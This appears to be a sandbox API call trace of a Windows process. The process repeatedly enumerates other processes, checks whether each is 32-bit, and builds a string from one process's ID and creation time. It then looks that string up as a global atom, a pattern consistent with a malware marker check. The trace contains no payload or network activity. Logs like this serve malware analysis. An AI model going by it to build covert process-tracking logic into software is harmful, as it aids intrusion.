	[0103.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0103.904] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.904] CloseHandle (hObject=0x694) returned 1
	[0103.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0103.904] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.904] CloseHandle (hObject=0x694) returned 1
	[0103.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0103.904] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.904] CloseHandle (hObject=0x694) returned 1
	[0103.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0103.904] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.904] CloseHandle (hObject=0x694) returned 1
	[0103.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0103.904] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.904] CloseHandle (hObject=0x694) returned 1
	[0103.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0103.905] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.905] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0103.905] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0103.905] wsprintfA (in: param_1=0x39936c8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0103.906] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.906] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0103.906] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.906] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0103.906] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0103.906] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0103.906] CloseHandle (hObject=0x694) returned 1
	[0103.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0103.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0103.906] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.907] CloseHandle (hObject=0x694) returned 1
	[0103.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0103.907] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.907] CloseHandle (hObject=0x694) returned 1
	[0103.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0103.907] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.907] CloseHandle (hObject=0x694) returned 1
	[0103.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0103.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0103.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0103.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0103.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0103.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0103.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0103.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0103.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0103.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0103.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0103.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0103.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0103.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0103.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0103.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0103.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0103.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0103.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0103.945] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.945] CloseHandle (hObject=0x694) returned 1
	[0103.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0103.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0103.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0103.945] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.945] CloseHandle (hObject=0x694) returned 1
	[0103.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0103.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0103.946] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.946] CloseHandle (hObject=0x694) returned 1
	[0103.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0103.946] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.946] CloseHandle (hObject=0x694) returned 1
	[0103.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0103.946] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.946] CloseHandle (hObject=0x694) returned 1
	[0103.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0103.946] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.946] CloseHandle (hObject=0x694) returned 1
	[0103.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0103.947] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.947] CloseHandle (hObject=0x694) returned 1
	[0103.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0103.947] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.947] CloseHandle (hObject=0x694) returned 1
	[0103.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0103.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0103.947] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.947] CloseHandle (hObject=0x694) returned 1
	[0103.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0103.947] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.947] CloseHandle (hObject=0x694) returned 1
	[0103.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0103.948] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.948] CloseHandle (hObject=0x694) returned 1
	[0103.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0103.948] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.948] CloseHandle (hObject=0x694) returned 1
	[0103.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0103.948] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.948] CloseHandle (hObject=0x694) returned 1
	[0103.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0103.948] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.948] CloseHandle (hObject=0x694) returned 1
	[0103.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0103.948] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.948] CloseHandle (hObject=0x694) returned 1
	[0103.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0103.949] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.949] CloseHandle (hObject=0x694) returned 1
	[0103.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0103.949] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.949] CloseHandle (hObject=0x694) returned 1
	[0103.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0103.949] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.949] CloseHandle (hObject=0x694) returned 1
	[0103.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0103.950] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.950] CloseHandle (hObject=0x694) returned 1
	[0103.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0103.950] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.950] CloseHandle (hObject=0x694) returned 1
	[0103.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0103.950] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.950] CloseHandle (hObject=0x694) returned 1
	[0103.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0103.950] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.950] CloseHandle (hObject=0x694) returned 1
	[0103.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0103.950] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.951] CloseHandle (hObject=0x694) returned 1
	[0103.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0103.951] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.951] CloseHandle (hObject=0x694) returned 1
	[0103.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0103.951] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.951] CloseHandle (hObject=0x694) returned 1
	[0103.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0103.951] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.951] CloseHandle (hObject=0x694) returned 1
	[0103.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0103.951] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.951] CloseHandle (hObject=0x694) returned 1
	[0103.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0103.951] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.952] CloseHandle (hObject=0x694) returned 1
	[0103.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0103.952] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.952] CloseHandle (hObject=0x694) returned 1
	[0103.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0103.952] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.952] CloseHandle (hObject=0x694) returned 1
	[0103.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0103.952] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.952] CloseHandle (hObject=0x694) returned 1
	[0103.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0103.953] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.953] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0103.953] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0103.953] wsprintfA (in: param_1=0x3993b28, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0103.953] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.954] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0103.954] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.954] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0103.954] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0103.954] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0103.954] CloseHandle (hObject=0x694) returned 1
	[0103.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0103.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0103.954] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.954] CloseHandle (hObject=0x694) returned 1
	[0103.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0103.955] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.955] CloseHandle (hObject=0x694) returned 1
	[0103.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0103.955] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.955] CloseHandle (hObject=0x694) returned 1
	[0103.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0103.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0103.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0103.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0103.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0103.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0103.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0103.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0103.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0103.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0103.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0103.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0103.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0103.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0103.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0103.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0103.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0103.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0103.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0103.995] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.995] CloseHandle (hObject=0x694) returned 1
	[0103.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0103.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0103.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0103.996] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.996] CloseHandle (hObject=0x694) returned 1
	[0103.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0103.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0103.996] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.996] CloseHandle (hObject=0x694) returned 1
	[0103.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0103.996] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.996] CloseHandle (hObject=0x694) returned 1
	[0103.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0103.997] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.997] CloseHandle (hObject=0x694) returned 1
	[0103.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0103.997] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.997] CloseHandle (hObject=0x694) returned 1
	[0103.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0103.997] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.997] CloseHandle (hObject=0x694) returned 1
	[0103.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0103.997] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.997] CloseHandle (hObject=0x694) returned 1
	[0103.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0103.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0103.998] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.998] CloseHandle (hObject=0x694) returned 1
	[0103.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0103.998] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.998] CloseHandle (hObject=0x694) returned 1
	[0103.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0103.998] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.998] CloseHandle (hObject=0x694) returned 1
	[0103.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0103.998] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.998] CloseHandle (hObject=0x694) returned 1
	[0103.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0103.998] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.998] CloseHandle (hObject=0x694) returned 1
	[0103.999] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0103.999] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.999] CloseHandle (hObject=0x694) returned 1
	[0103.999] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0103.999] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.999] CloseHandle (hObject=0x694) returned 1
	[0103.999] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0103.999] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.999] CloseHandle (hObject=0x694) returned 1
	[0103.999] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0103.999] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.999] CloseHandle (hObject=0x694) returned 1
	[0103.999] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0103.999] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.999] CloseHandle (hObject=0x694) returned 1
	[0104.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0104.000] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.000] CloseHandle (hObject=0x694) returned 1
	[0104.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0104.000] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.000] CloseHandle (hObject=0x694) returned 1
	[0104.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0104.000] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.000] CloseHandle (hObject=0x694) returned 1
	[0104.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0104.001] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.001] CloseHandle (hObject=0x694) returned 1
	[0104.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0104.001] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.001] CloseHandle (hObject=0x694) returned 1
	[0104.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0104.001] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.001] CloseHandle (hObject=0x694) returned 1
	[0104.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0104.001] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.001] CloseHandle (hObject=0x694) returned 1
	[0104.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0104.001] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.001] CloseHandle (hObject=0x694) returned 1
	[0104.002] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0104.002] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.002] CloseHandle (hObject=0x694) returned 1
	[0104.002] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0104.002] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.002] CloseHandle (hObject=0x694) returned 1
	[0104.002] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0104.002] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.002] CloseHandle (hObject=0x694) returned 1
	[0104.002] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0104.002] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.002] CloseHandle (hObject=0x694) returned 1
	[0104.002] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.002] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.002] CloseHandle (hObject=0x694) returned 1
	[0104.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.003] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.003] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0104.003] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
